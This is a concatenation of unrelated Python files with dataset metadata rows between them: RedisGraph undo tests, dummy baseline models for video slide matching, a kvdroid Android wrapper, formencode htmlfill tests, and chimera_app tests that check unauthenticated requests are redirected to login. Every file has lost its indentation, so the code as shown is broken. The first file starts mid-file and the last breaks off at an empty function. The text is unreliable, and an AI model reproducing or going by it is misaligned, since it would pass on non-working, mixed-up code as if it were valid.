# introduce a new attribute `n.e`
try:
self.graph.query("""MATCH (n:N {a: 1})
SET n.e = 1
WITH n
RETURN 1 * 'a'""")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except:
pass
# expecting the original attributes to be deleted
result = self.graph.query("MATCH (n:N) RETURN n.e")
self.env.assertEquals(result.result_set[0][0], None)
# introduce a new Label `n:M`
try:
self.graph.query("""MATCH (n:N {a: 1})
SET n:M
WITH n
RETURN 1 * 'a'""")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except:
pass
# expecting the additional label 'M' to be removed
result = self.graph.query("MATCH (n:M) RETURN COUNT(n)")
self.env.assertEquals(result.result_set[0][0], 0)
# clear all attributes of `n`
try:
self.graph.query("""MATCH (n:N {a: 1})
SET n = {}
WITH n
RETURN 'a' * 1""")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except:
pass
# expecting the original attributes to be restored
result = self.graph.query("MATCH (n:N) RETURN n.a, n.b, n.c, n.d")
self.env.assertEquals(result.result_set[0][0], 1)
self.env.assertEquals(result.result_set[0][1], 'str')
self.env.assertEquals(result.result_set[0][2], [1, 'str', {'latitude':1, 'longitude':2}])
self.env.assertEquals(result.result_set[0][3], {'latitude':1, 'longitude':2})
try:
self.graph.query("""MATCH (n:N {a: 1})
SET n += {e: 1}
WITH n
RETURN 'a' * 1""")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except:
pass
# expecting the original attributes to be restored
result = self.graph.query("MATCH (n:N) RETURN n.a, n.b, n.c, n.d, n.e")
self.env.assertEquals(result.result_set[0][0], 1)
self.env.assertEquals(result.result_set[0][1], 'str')
self.env.assertEquals(result.result_set[0][2], [1, 'str', {'latitude':1, 'longitude':2}])
self.env.assertEquals(result.result_set[0][3], {'latitude':1, 'longitude':2})
self.env.assertEquals(result.result_set[0][4], None)
def test06_undo_update_edge(self):
self.graph.query("CREATE (:N)-[:R {v: 1}]->(:N)")
try:
self.graph.query("""MATCH ()-[r]->()
SET r.v = 2
WITH r
RETURN 'a' * 1""")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except:
pass
# expecting the original attributes to be restored
result = self.graph.query("MATCH ()-[r]->() RETURN r.v")
self.env.assertEquals(result.result_set[0][0], 1)
def test07_undo_create_indexed_node(self):
self.graph.query("CREATE INDEX FOR (n:N) ON (n.v)")
try:
self.graph.query("CREATE (n:N {v:1}) WITH n RETURN 1 * 'a'")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except:
pass
# node (n:N) should be removed, expecting an empty graph
result = self.graph.query("MATCH (n:N {v:1}) RETURN n")
self.env.assertEquals(len(result.result_set), 0)
def test08_undo_create_indexed_edge(self):
self.graph.query("CREATE INDEX FOR ()-[r:R]->() ON (r.v)")
self.graph.query("CREATE (:N {v: 1}), (:N {v: 2})")
try:
self.graph.query("""MATCH (s:N {v: 1}), (t:N {v: 2})
CREATE (s)-[r:R {v:1}]->(t)
WITH r
RETURN 1 * 'a'""")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except:
pass
# edge [r:R] should have been removed
result = self.graph.query("MATCH ()-[r:R {v:1}]->() RETURN r")
self.env.assertEquals(len(result.result_set), 0)
def test09_undo_delete_indexed_node(self):
self.graph.query("CREATE INDEX FOR (n:N) ON (n.v)")
self.graph.query("CREATE (:N {v: 0})")
try:
self.graph.query("""MATCH (n:N)
DELETE n
WITH n
RETURN 'a' * 1""")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except:
pass
# deleted node should be revived, expecting a single node
query = "MATCH (n:N {v: 0}) RETURN n"
plan = self.graph.execution_plan(query)
self.env.assertContains("Node By Index Scan", plan)
result = self.graph.query(query)
self.env.assertEquals(len(result.result_set), 1)
def test10_undo_delete_indexed_edge(self):
self.graph.query("CREATE INDEX FOR ()-[r:R]->() ON (r.v)")
self.graph.query("CREATE (:N)-[:R {v: 0}]->(:N)")
try:
self.graph.query("""MATCH ()-[r:R]->()
DELETE r
WITH r
RETURN 'a' * 1""")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except:
pass
# deleted edge should be revived, expecting a single edge
query = "MATCH ()-[r:R {v: 0}]->() RETURN r"
plan = self.graph.execution_plan(query)
self.env.assertContains("Edge By Index Scan", plan)
result = self.graph.query(query)
self.env.assertEquals(len(result.result_set), 1)
def test11_undo_update_indexed_node(self):
self.graph.query("CREATE INDEX FOR (n:N) ON (n.v)")
self.graph.query("CREATE (:N {v: 1})")
try:
self.graph.query("""MATCH (n:N {v: 1})
SET n.v = 2
WITH n
RETURN 'a' * 1""")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except:
pass
# expecting the original attributes to be restored and indexed
query = "MATCH (n:N {v: 1}) RETURN n.v"
plan = self.graph.execution_plan(query)
self.env.assertContains("Node By Index Scan", plan)
result = self.graph.query(query)
self.env.assertEquals(result.result_set[0][0], 1)
def test12_undo_update_indexed_edge(self):
self.graph.query("CREATE INDEX FOR ()-[r:R]->() ON (r.v)")
self.graph.query("CREATE (:N)-[:R {v: 1}]->(:N)")
try:
self.graph.query("""MATCH ()-[r]->()
SET r.v = 2
WITH r
RETURN 'a' * 1""")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except:
pass
# expecting the original attributes to be restored and indexed
query = "MATCH ()-[r:R {v: 1}]->() RETURN r.v"
plan = self.graph.execution_plan(query)
self.env.assertContains("Edge By Index Scan", plan)
result = self.graph.query(query)
self.env.assertEquals(result.result_set[0][0], 1)
def test13_undo_implicit_edge_delete(self):
self.graph.query("CREATE (n:N), (m:N), (n)-[:R]->(m), (n)-[:R]->(m)")
try:
self.graph.query("""MATCH (n:N)
DETACH DELETE n
WITH n
RETURN 1 * 'a'""")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except:
pass
# deleted node should be revived, expecting a single node
result = self.graph.query("MATCH (n:N) RETURN n")
self.env.assertEquals(len(result.result_set), 2)
result = self.graph.query("MATCH ()-[r:R]->() RETURN r")
self.env.assertEquals(len(result.result_set), 2)
def test14_undo_timeout(self):
# Change timeout value from default
response = self.redis_con.execute_command("GRAPH.CONFIG SET TIMEOUT 1")
self.env.assertEqual(response, "OK")
try:
self.graph.query("UNWIND range(1, 1000000) AS x CREATE (n:N)")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except Exception as e:
pass
# node (n:N) should be removed, expecting an empty graph
result = self.graph.query("MATCH (n:N) RETURN n")
self.env.assertEquals(len(result.result_set), 0)
# Restore timeout value to default
response = self.redis_con.execute_command("GRAPH.CONFIG SET TIMEOUT 0")
self.env.assertEqual(response, "OK")
def test15_complex_undo(self):
# create a graph
self.graph.query("UNWIND range(1, 3) AS x CREATE (:N {v:x})-[:R{v:x}]->(:N {v:x})")
try:
self.graph.query("MATCH (n:N)-[r:R]->(m:N) SET n.v = n.v + 1, r.v = r.v + 1, m.v = m.v + 1 CREATE (:N{v:n.v}) DELETE r RETURN CASE n.v WHEN 3 THEN n.v * 'a' ELSE n.v END")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except Exception as e:
self.env.assertEquals(str(e), "Type mismatch: expected Integer but was String")
# validate that no changes were made to the created graph
expected_result = [[1, 1, 1], [2, 2, 2], [3, 3, 3]]
result = self.graph.query("MATCH (n:N)-[r:R]->(m:N) RETURN n.v, r.v, m.v")
self.env.assertEquals(result.result_set, expected_result)
| 41.221239
| 183
| 0.515171
| 1,825
| 13,974
| 3.890411
| 0.083836
| 0.078592
| 0.112394
| 0.085634
| 0.861268
| 0.845634
| 0.829859
| 0.807042
| 0.785352
| 0.779577
| 0
| 0.020053
| 0.350508
| 13,974
| 338
| 184
| 41.343195
| 0.76223
| 0.156505
| 0
| 0.738956
| 0
| 0.036145
| 0.348948
| 0.001789
| 0
| 0
| 0
| 0
| 0.2249
| 1
| 0.068273
| false
| 0.072289
| 0.004016
| 0
| 0.076305
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
617fde5e790fa32b6a408ccbfac1978e6767ac19
| 48
|
py
|
Python
|
AIPOC/AIPOC/features/basic_ques/basic_question.py
|
aipoc-ai/aipoc
|
6d1c992ab72485b0f2d6a46d6048705dbc03f7f4
|
[
"MIT"
] | null | null | null |
AIPOC/AIPOC/features/basic_ques/basic_question.py
|
aipoc-ai/aipoc
|
6d1c992ab72485b0f2d6a46d6048705dbc03f7f4
|
[
"MIT"
] | 1
|
2021-10-09T07:04:16.000Z
|
2021-10-09T07:04:16.000Z
|
AIPOC/AIPOC/features/basic_ques/basic_question.py
|
aipoc-ai/aipoc
|
6d1c992ab72485b0f2d6a46d6048705dbc03f7f4
|
[
"MIT"
] | null | null | null |
def name_owner():
return "Deepanshu tyagi"
| 12
| 28
| 0.6875
| 6
| 48
| 5.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.208333
| 48
| 3
| 29
| 16
| 0.842105
| 0
| 0
| 0
| 0
| 0
| 0.319149
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
61ae11224c50296c02eee9aed8e249d79fc2f39d
| 2,793
|
py
|
Python
|
models/task1/subtaskb/dummy.py
|
video699/research-system
|
55abcce3deea8f7d48a5f534565714e5c4686185
|
[
"MIT"
] | null | null | null |
models/task1/subtaskb/dummy.py
|
video699/research-system
|
55abcce3deea8f7d48a5f534565714e5c4686185
|
[
"MIT"
] | null | null | null |
models/task1/subtaskb/dummy.py
|
video699/research-system
|
55abcce3deea8f7d48a5f534565714e5c4686185
|
[
"MIT"
] | null | null | null |
"""
This module implements unsupervised task 1, subtask B dummy models that provide baseline
scores and integration testing of the evaluation code.
"""
from random import randint
from .base import Model
class Best(Model):
"""
This class represents a task 1, subtask B model that cheats to obtain the best
possible results.
"""
def predict(self, observations):
predictions = []
for screen_video, page_video in observations:
pages = page_video.pages
for screen in screen_video.screens:
prediction = any(page in screen.matching_pages for page in pages)
predictions.append(prediction)
return predictions
def _filename(self):
return "%s.%s" % (__name__, self.__class__.__name__)
def __repr__(self):
return "(Best)"
class Worst(Model):
"""
This class represents a task 1, subtask B model that cheats to obtain the worst
possible results.
"""
def predict(self, observations):
predictions = []
for screen_video, page_video in observations:
pages = page_video.pages
for screen in screen_video.screens:
prediction = all(page not in screen.matching_pages for page in pages)
predictions.append(prediction)
return predictions
def _filename(self):
return "%s.%s" % (__name__, self.__class__.__name__)
def __repr__(self):
return "(Worst)"
class Random(Model):
"""
This class represents a task 1, subtask B model that picks results at random.
"""
def predict(self, observations):
predictions = []
for screen_video, _ in observations:
for __ in screen_video.screens:
prediction = randint(0, 1)
predictions.append(prediction)
return predictions
def _filename(self):
return "%s.%s" % (__name__, self.__class__.__name__)
def __repr__(self):
return "(Random)"
class Conservative(Model):
"""
This class represents a task 1, subtask B model that marks all screens as matchable,
since wrongly marking a screen as non-matchable is costly in terms of the evaluation metric.
"""
def predict(self, observations):
predictions = []
for screen_video, _ in observations:
for __ in screen_video.screens:
prediction = True
predictions.append(prediction)
return predictions
def _filename(self):
return "%s.%s" % (__name__, self.__class__.__name__)
def __repr__(self):
return "(Conservative)"
BEST = Best()
WORST = Worst()
RANDOM = Random()
CONSERVATIVE = Conservative()
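# Illustrative sketch: the SimpleNamespace objects below are hypothetical stand-ins
# for the real screen/page objects; they only mimic the .screens, .pages and
# .matching_pages attributes that the predict() methods above read.
if __name__ == '__main__':
    from types import SimpleNamespace

    page = SimpleNamespace()
    screen = SimpleNamespace(matching_pages=[page])
    observations = [(SimpleNamespace(screens=[screen]), SimpleNamespace(pages=[page]))]

    print(BEST.predict(observations))          # [True]  -- the single page matches
    print(WORST.predict(observations))         # [False]
    print(CONSERVATIVE.predict(observations))  # [True]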
| 30.358696
| 100
| 0.620122
| 312
| 2,793
| 5.269231
| 0.24359
| 0.053528
| 0.036496
| 0.039538
| 0.721411
| 0.721411
| 0.721411
| 0.721411
| 0.721411
| 0.721411
| 0
| 0.003575
| 0.298962
| 2,793
| 91
| 101
| 30.692308
| 0.836057
| 0.212675
| 0
| 0.649123
| 0
| 0
| 0.026404
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.210526
| false
| 0
| 0.035088
| 0.140351
| 0.526316
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
61b2dd88b0d6ba41ac6d4d8f48e8c4879718fcfa
| 242
|
py
|
Python
|
kvdroid/jclass/android/hardware/camera2/params.py
|
kengoon/PyAndroidKX
|
53b72b51c7b9aec06bbc330e7bf0f2e3a89736e2
|
[
"MIT"
] | 1
|
2021-11-22T17:22:53.000Z
|
2021-11-22T17:22:53.000Z
|
kvdroid/jclass/android/hardware/camera2/params.py
|
kengoon/PyAndroidKX
|
53b72b51c7b9aec06bbc330e7bf0f2e3a89736e2
|
[
"MIT"
] | null | null | null |
kvdroid/jclass/android/hardware/camera2/params.py
|
kengoon/PyAndroidKX
|
53b72b51c7b9aec06bbc330e7bf0f2e3a89736e2
|
[
"MIT"
] | null | null | null |
from jnius import autoclass
from kvdroid.jclass import _class_call
def StreamConfigurationMap(*args, instantiate: bool = False):
return _class_call(autoclass("android.hardware.camera2.params.StreamConfigurationMap"), args, instantiate)
| 34.571429
| 110
| 0.818182
| 27
| 242
| 7.185185
| 0.703704
| 0.092784
| 0.381443
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004587
| 0.099174
| 242
| 6
| 111
| 40.333333
| 0.885321
| 0
| 0
| 0
| 0
| 0
| 0.223141
| 0.223141
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
|
0
| 7
|
4ee4fa6c541f92c57a805d12be45fe60aa44a7bf
| 7,151
|
py
|
Python
|
formencode/tests/test_htmlfill_control.py
|
pgajdos/formencode
|
fe29722f3398fd0b1df7d7db4278a0b2d5f8fda3
|
[
"MIT"
] | 63
|
2015-02-14T11:49:59.000Z
|
2022-02-02T22:15:16.000Z
|
formencode/tests/test_htmlfill_control.py
|
pgajdos/formencode
|
fe29722f3398fd0b1df7d7db4278a0b2d5f8fda3
|
[
"MIT"
] | 102
|
2015-01-08T18:01:46.000Z
|
2022-01-25T01:20:09.000Z
|
formencode/tests/test_htmlfill_control.py
|
pgajdos/formencode
|
fe29722f3398fd0b1df7d7db4278a0b2d5f8fda3
|
[
"MIT"
] | 44
|
2015-01-11T13:22:57.000Z
|
2021-12-02T08:54:17.000Z
|
from __future__ import absolute_import
from formencode import htmlfill
# ==============================================================================
def test_defaults_legacy():
html = """
<input type="text" name="foo" value="bar" />
<input type="text" name="foo" value="biz" />
<input type="text" name="foo" value="bash" />
"""
expected_html = """
<input type="text" name="foo" value="bang" />
<input type="text" name="foo" value="bang" />
<input type="text" name="foo" value="bang" />
"""
rendered_html = htmlfill.render(html, defaults={"foo": "bang"},
force_defaults=True)
assert expected_html == rendered_html
def test_defaults_attr_ignore():
html = """
<input type="text" name="foo" value="bar" data-formencode-ignore="1" />
<input type="text" name="foo" value="" />
<input type="text" name="foo" value="bash" data-formencode-ignore="1" />
<input type="text" name="foo" value="bash" data-formencode-ignore="" />
<input type="text" name="foo" value="bash" data-formencode-ignore />
"""
expected_html = """
<input type="text" name="foo" value="bar" data-formencode-ignore="1" />
<input type="text" name="foo" value="bang" />
<input type="text" name="foo" value="bash" data-formencode-ignore="1" />
<input type="text" name="foo" value="bash" data-formencode-ignore="" />
<input type="text" name="foo" value="bash" data-formencode-ignore />
"""
rendered_html = htmlfill.render(html, defaults={"foo": "bang"},
force_defaults=True,
data_formencode_ignore=True)
assert expected_html == rendered_html
def test_defaults_attr_form():
html = """
<input type="text" name="foo" value="bar" data-formencode-form="a" />
<input type="text" name="foo" value="" data-formencode-form="b" />
<input type="text" name="foo" value="bash" data-formencode-form="c" />
"""
expected_html = """
<input type="text" name="foo" value="bar" data-formencode-form="a" />
<input type="text" name="foo" value="bang" data-formencode-form="b" />
<input type="text" name="foo" value="bash" data-formencode-form="c" />
"""
rendered_html = htmlfill.render(html, defaults={"foo": "bang"},
force_defaults=True,
data_formencode_form="b",)
assert expected_html == rendered_html
# ==============================================================================
def test_error_legacy():
html = """
<input type="text" name="foo" value="bar" />
<input type="text" name="foo" value="biz" />
<input type="text" name="foo" value="bash" />
"""
expected_html = """
<!-- for: foo -->
<span class="error-message">bang</span><br />
<input type="text" name="foo" value="" class="error" />
<input type="text" name="foo" value="" class="error" />
<input type="text" name="foo" value="" class="error" />
"""
rendered_html = htmlfill.render(html, errors={"foo": "bang"},
prefix_error=True)
assert expected_html == rendered_html
def test_error_attr_ignore():
html = """
<input type="text" name="foo" value="bar" data-formencode-form="a" />
<input type="text" name="foo" value="biz" data-formencode-form="b" />
<input type="text" name="foo" value="bash" data-formencode-form="c" />
"""
expected_html = """
<input type="text" name="foo" value="bar" data-formencode-form="a" />
<!-- for: foo -->
<span class="error-message">bang</span><br />
<input type="text" name="foo" value="" data-formencode-form="b" class="error" />
<input type="text" name="foo" value="bash" data-formencode-form="c" />
"""
rendered_html = htmlfill.render(html, errors={"foo": "bang"},
force_defaults=True,
data_formencode_form="b",)
assert expected_html == rendered_html
def test_error_attr_form():
html = """
<input type="text" name="foo" value="bar" data-formencode-form="a" />
<input type="text" name="foo" value="" data-formencode-form="b" />
<input type="text" name="foo" value="bash" data-formencode-form="c" />
"""
expected_html = """
<input type="text" name="foo" value="bar" data-formencode-form="a" />
<!-- for: foo -->
<span class="error-message">bang</span><br />
<input type="text" name="foo" value="" data-formencode-form="b" class="error" />
<input type="text" name="foo" value="bash" data-formencode-form="c" />
"""
rendered_html = htmlfill.render(html, errors={"foo": "bang"},
force_defaults=True,
data_formencode_form="b",)
assert expected_html == rendered_html
def test_error_attr_form_alt():
"""note that formencode doesn't keep an indent on the replacement
This test mixes concepts. Note a few things:
1. we expect a leading "<!-- for: apple -->" block, because we are ignoring that tag
2. we expect the leading "<!-- for: apple -->" block to not have an initial newline (\n)
"""
html = """
<form data-formencode-form="a">
<input type="text" name="bar" value="foo" data-formencode-form="a" />
<input type="text" name="foo" value="bar" data-formencode-form="a" />
</form>
<form data-formencode-form="b">
<input type="text" name="bar" value="foo" data-formencode-form="b" />
<input type="text" name="foo" value="" data-formencode-form="b" />
</form>
<form data-formencode-form="c">
<input type="text" name="bar" value="foo" data-formencode-form="c" />
<input type="text" name="foo" value="bash" data-formencode-form="c" />
<input type="text" name="apple" value="pear" data-formencode-form="c" data-formencode-ignore="1" />
</form>
"""
expected_html = """<!-- for: apple -->
<span class="error-message">orange</span><br />
<form data-formencode-form="a">
<input type="text" name="bar" value="foo" data-formencode-form="a" />
<input type="text" name="foo" value="bar" data-formencode-form="a" />
</form>
<form data-formencode-form="b">
<input type="text" name="bar" value="foo" data-formencode-form="b" />
<input type="text" name="foo" value="" data-formencode-form="b" />
</form>
<form data-formencode-form="c">
<input type="text" name="bar" value="bang" data-formencode-form="c" />
<!-- for: foo -->
<span class="error-message">bang</span><br />
<input type="text" name="foo" value="" data-formencode-form="c" class="error" />
<input type="text" name="apple" value="pear" data-formencode-form="c" data-formencode-ignore="1" />
</form>
"""
rendered_html = htmlfill.render(html, defaults={"bar": "bang"},
errors={"foo": "bang", "apple": "orange"},
force_defaults=True,
data_formencode_form="c",
data_formencode_ignore=True,
)
assert expected_html == rendered_html
if __name__ == '__main__':
test_defaults_legacy()
test_defaults_attr_ignore()
test_defaults_attr_form()
test_error_legacy()
test_error_attr_ignore()
test_error_attr_form()
test_error_attr_form_alt()
| 40.174157
| 103
| 0.592924
| 900
| 7,151
| 4.602222
| 0.085556
| 0.117335
| 0.169483
| 0.221632
| 0.881941
| 0.867214
| 0.851521
| 0.845244
| 0.833655
| 0.808064
| 0
| 0.00139
| 0.195078
| 7,151
| 178
| 104
| 40.174157
| 0.718207
| 0.066145
| 0
| 0.777027
| 0
| 0.256757
| 0.641733
| 0.202368
| 0
| 0
| 0
| 0
| 0.040541
| 1
| 0.047297
| false
| 0
| 0.013514
| 0
| 0.060811
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
9c911cf29fdc03e3ab82e2751ca37f8ef5b50e74
| 11,836
|
py
|
Python
|
tests/test_unauthorized_access.py
|
Samsagax/steam-buddy
|
a8465e45648d6f3fcff23bb3b82d5e30e46dc4ed
|
[
"MIT"
] | 76
|
2019-11-30T17:35:55.000Z
|
2021-06-06T23:12:31.000Z
|
tests/test_unauthorized_access.py
|
Samsagax/steam-buddy
|
a8465e45648d6f3fcff23bb3b82d5e30e46dc4ed
|
[
"MIT"
] | 130
|
2019-11-16T00:34:12.000Z
|
2021-06-13T13:14:01.000Z
|
tests/test_unauthorized_access.py
|
Samsagax/steam-buddy
|
a8465e45648d6f3fcff23bb3b82d5e30e46dc4ed
|
[
"MIT"
] | 15
|
2019-11-07T18:32:25.000Z
|
2021-06-12T20:55:40.000Z
|
import os
import pytest
import subprocess
from webtest import TestApp
from chimera_app.server import server
from chimera_app.server import PLATFORM_HANDLERS
from chimera_app.config import PLATFORMS
from chimera_app.config import AUTHENTICATOR_PATH
# Prevent pytest from trying to collect webtest's TestApp as tests:
TestApp.__test__ = False
@pytest.fixture
def unauthorized_app(monkeypatch):
def mock_launch(self):
if not os.path.isfile(AUTHENTICATOR_PATH):
raise FileNotFoundError(
f'Authenticator not found at path {AUTHENTICATOR_PATH}'
)
from chimera_app.authenticator import Authenticator
monkeypatch.setattr(Authenticator, 'launch', mock_launch)
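# The two delattr calls below remove subprocess.call and os.system outright, so any handler that tries to shell out during these unauthorized-access tests fails immediately.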
monkeypatch.delattr(subprocess, "call", raising=True)
monkeypatch.delattr(os, "system", raising=True)
yield TestApp(server)
def test_login_page(unauthorized_app):
assert (unauthorized_app.get('/login').status == '200 OK')
def test_root(unauthorized_app):
resp = unauthorized_app.get('/')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_platform_page(unauthorized_app):
for platform in PLATFORMS:
resp = unauthorized_app.get(f'/library/{platform}')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_platform_authenticate(unauthorized_app):
for platform in PLATFORM_HANDLERS:
resp = unauthorized_app.post(f'/library/{platform}/authenticate')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_platform_banners(unauthorized_app):
for platform in PLATFORMS:
resp = unauthorized_app.get(f'/banners/{platform}/giberish')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_platform_new(unauthorized_app):
for platform in PLATFORMS:
resp = unauthorized_app.get(f'/library/{platform}/new')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_platform_edit(unauthorized_app):
for platform in PLATFORMS:
resp = unauthorized_app.get(f'/library/{platform}/edit/giberish')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_flathub_images(unauthorized_app):
resp = unauthorized_app.get('/images/flathub/giberish')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_shortcuts_create(unauthorized_app):
resp = unauthorized_app.post('/shortcuts/new')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_shortcuts_edit(unauthorized_app):
resp = unauthorized_app.post('/shortcuts/edit')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_shortcuts_delete(unauthorized_app):
resp = unauthorized_app.post('/shortcuts/delete')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_shortcuts_file_upload_post(unauthorized_app):
resp = unauthorized_app.post('/shortcuts/file-upload')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_shortcuts_file_upload_patch(unauthorized_app):
resp = unauthorized_app.patch('/shortcuts/file-upload')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_shortcuts_file_upload_head(unauthorized_app):
resp = unauthorized_app.head('/shortcuts/file-upload')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_shortcuts_file_upload_delete(unauthorized_app):
resp = unauthorized_app.delete('/shortcuts/file-upload')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_platform_install(unauthorized_app):
for platform in PLATFORM_HANDLERS:
resp = unauthorized_app.get(f'/{platform}/install/giberish')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_platform_uninstall(unauthorized_app):
for platform in PLATFORM_HANDLERS:
resp = unauthorized_app.get(f'/{platform}/uninstall/giberish')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_platform_update(unauthorized_app):
for platform in PLATFORM_HANDLERS:
resp = unauthorized_app.get(f'/{platform}/update/giberish')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_platform_progress(unauthorized_app):
for platform in PLATFORM_HANDLERS:
resp = unauthorized_app.get(f'/{platform}/update/giberish')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_settings(unauthorized_app):
resp = unauthorized_app.get('/system')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_settings_update(unauthorized_app):
resp = unauthorized_app.post('/system/update')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_mangohud_reset(unauthorized_app):
resp = unauthorized_app.post('/system/reset_mangohud')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_steam_restart(unauthorized_app):
resp = unauthorized_app.get('/actions/steam/restart')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_steam_compositor(unauthorized_app):
resp = unauthorized_app.get('/actions/steam/compositor')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_steam_overlay(unauthorized_app):
resp = unauthorized_app.get('/actions/steam/overlay')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_mangohud(unauthorized_app):
resp = unauthorized_app.get('/actions/mangohud')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_streaming(unauthorized_app):
resp = unauthorized_app.get('/streaming')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_streaming_config(unauthorized_app):
resp = unauthorized_app.get('/streaming/config')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_streaming_add_input(unauthorized_app):
resp = unauthorized_app.post('/streaming/add_input')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_streaming_remove_input(unauthorized_app):
resp = unauthorized_app.post('/streaming/remove_input/123456')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_streaming_add_vcodec(unauthorized_app):
resp = unauthorized_app.post('/streaming/add_vcodec')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_streaming_remove_vcodec(unauthorized_app):
resp = unauthorized_app.post('/streaming/remove_vcodec/123456')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_streaming_add_acodec(unauthorized_app):
resp = unauthorized_app.post('/streaming/add_acodec')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_streaming_remove_acodec(unauthorized_app):
resp = unauthorized_app.post('/streaming/remove_acodec/123456')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_streaming_net_start(unauthorized_app):
resp = unauthorized_app.get('/streaming/net/start')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_streaming_net_stop(unauthorized_app):
resp = unauthorized_app.get('/streaming/net/stop')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_record_start(unauthorized_app):
resp = unauthorized_app.get('/record/start')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_record_stop(unauthorized_app):
